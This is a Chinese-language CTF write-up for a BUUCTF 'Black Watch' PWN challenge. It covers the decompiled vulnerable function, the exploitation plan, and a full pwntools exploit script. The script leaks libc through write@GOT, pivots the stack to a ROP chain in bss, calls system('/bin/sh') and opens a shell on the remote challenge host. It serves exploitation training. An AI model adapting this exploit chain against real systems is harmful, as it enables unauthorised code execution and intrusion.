[buuctf][Black Watch 入群题]PWN
作者:互联网
[Black Watch 入群题]PWN
1.checksec:
2.运行一下:
3.ida分析:
1.main函数:
int __cdecl main(int argc, const char **argv, const char **envp)
{
vul_function();
puts("GoodBye!");
return 0;
}
2.vul_function函数:
ssize_t vul_function()
{
size_t v0; // eax
size_t v1; // eax
char buf[24]; // [esp+0h] [ebp-18h] BYREF
v0 = strlen(m1);
write(1, m1, v0); // Hello good Ctfer! // What is your name?
read(0, &s, 0x200u); // 写到bss段的s上面
v1 = strlen(m2);
write(1, m2, v1); // What do you want to say?
return read(0, buf, 0x20u); // 能够溢出8字节
}
4.利用思路:
首先,要泄漏libc,然后发现栈上的buf只能溢出8字节,远远不够构造rop链,所以我们可以在s处构造rop链,然后通过栈迁移到bss段来执行rop。
5.exp:
from pwn import *
from LibcSearcher import *
context.log_level="debug"
context.arch="i386"
#io=process("spwn")
io=remote("node4.buuoj.cn",28768)
elf=ELF("spwn")
write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=0x08048513
s_addr=0x0804A300
leave_ret=0x08048511
io.recvuntil("name?")
payload1=p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
io.send(payload1)
io.recvuntil("say?")
payload2=b'A'*0x18+p32(s_addr-4)+p32(leave_ret)
io.send(payload2)
write_addr=u32(io.recv(4))
print("write_addr=",end='')
print(hex(write_addr))
libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
print("libc_base=",end='')
print(hex(libc_base))
system=libc_base+libc.dump("system")
bin_sh=libc_base+libc.dump("str_bin_sh")
io.recvuntil("name?")
payload3=p32(system)+p32(main)+p32(bin_sh)
io.sendline(payload3)
io.recvuntil("say?")
io.sendline(payload2)
io.interactive()
6.拿到flag:
标签:buuctf,addr,libc,Watch,write,p32,io,PWN,main 来源: https://www.cnblogs.com/happynoy/p/16270152.html